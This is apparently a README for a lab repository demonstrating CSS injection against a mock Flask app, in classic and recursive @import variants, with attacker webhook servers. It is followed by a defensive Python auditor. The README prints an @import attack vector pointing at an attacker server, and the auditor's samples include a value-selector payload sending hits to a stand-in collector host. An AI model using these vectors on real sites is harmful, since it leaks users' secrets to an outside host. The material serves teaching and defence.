/CSS-Injection

CSS Injection.

Primary Language: Python

c5517n


Requirements

Click==7.0
Flask==1.1.1
itsdangerous==1.1.0
Jinja2==2.10.3
MarkupSafe==1.1.1
pyperclip==1.7.0
Werkzeug==0.16.0

Install the dependencies:

  pip install -r requirements.txt

Classic

Overview

An example of a classic CSS Injection attack. The attacker needs the user to POST the attack vector every time.

Usage

  1. Run attacker/server.py and user/server.py.
  2. Run attacker/exploit.py.
  3. Post the attack vector generated by attacker/exploit.py to 0.0.0.0:8080. The leaked secret will be displayed on the console of attacker/server.py.
  4. Enter the leaked secret into attacker/exploit.py and continue the attack.
  5. Loop...

Files

  • user/server.py: Mock web application that has a CSS Injection vulnerability.
  • attacker/exploit.py: Generates a CSS Injection attack vector and copies it to the clipboard.
  • attacker/server.py: Webhook to collect secret.

Recursive

Overview

An example of CSS Injection using the Recursive Import technique.

Usage

  1. Run attacker/server.py and user/server.py.
  2. Post the attack vector: <style>@import url('http://0.0.0.0:8081/css/0.css')</style>.
  3. Leakage continues recursively because each imported stylesheet triggers the next CSS import.

Files

  • user/server.py: Mock web application that has a CSS Injection vulnerability.
  • attacker/server.py: Webhook to collect secret.
  • attacker/templates/tmpl.jinja2: Attack vector (CSS) template.
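
A defender-side check for both the Classic and Recursive variants above, added here as an example and not part of this repository's code: it audits a submitted body for style blocks that import from, or pair a value-attribute selector with a URL on, a host outside an allow-list. The names audit_submission and is_external, the hosts app.example and collector.example, and every sample except the README's own @import vector are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Assumption: hosts the application itself serves stylesheets from.
ALLOWED_HOSTS = {"app.example"}

# A <style> block; an unclosed tag still runs to end of input in a browser.
STYLE_BLOCK = re.compile(r"<style\b[^>]*>(.*?)(?:</style\s*>|\Z)", re.I | re.S)
# @import "x", @import 'x' and @import url(x) forms.
IMPORT_RULE = re.compile(r"@import\s+(?:url\(\s*)?['\"]?([^'\")\s;]+)", re.I)
# Prefix/suffix/substring selectors on a form field's value attribute.
VALUE_SELECTOR = re.compile(r"\[\s*value\s*[\^$*]=", re.I)
URL_FUNC = re.compile(r"url\(\s*['\"]?([^'\")\s]+)", re.I)


def is_external(url, allowed_hosts=ALLOWED_HOSTS):
    """True when the URL names a host outside the allow-list (relative URLs pass)."""
    host = urlparse(url).hostname
    return host is not None and host not in allowed_hosts


def audit_submission(html, allowed_hosts=ALLOWED_HOSTS):
    """Return (finding, url) pairs for style content that loads from other hosts."""
    findings = []
    for css in STYLE_BLOCK.findall(html):
        for target in IMPORT_RULE.findall(css):
            if is_external(target, allowed_hosts):
                findings.append(("external-import", target))
        if VALUE_SELECTOR.search(css):
            for target in URL_FUNC.findall(css):
                if is_external(target, allowed_hosts):
                    findings.append(("value-selector-external-url", target))
    return findings


# Constructed sample submissions; only the "recursive" one is taken from the README.
SAMPLES = {
    "recursive": "<style>@import url('http://0.0.0.0:8081/css/0.css')</style>",
    "classic": '<style>input[value^="a"]{background:url(http://collector.example/hit)}</style>',
    "unclosed": "<style>@import url(//collector.example/0.css)",
    "benign": '<style>@import "/static/theme.css"; p{color:red}</style>',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, audit_submission(body))
```

Pattern matching like this is a tripwire for logging or rejecting input, not a fix: escaping user input on output and a Content-Security-Policy that restricts style-src to the application's own origin are what close the hole.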

Reference

m---/onsen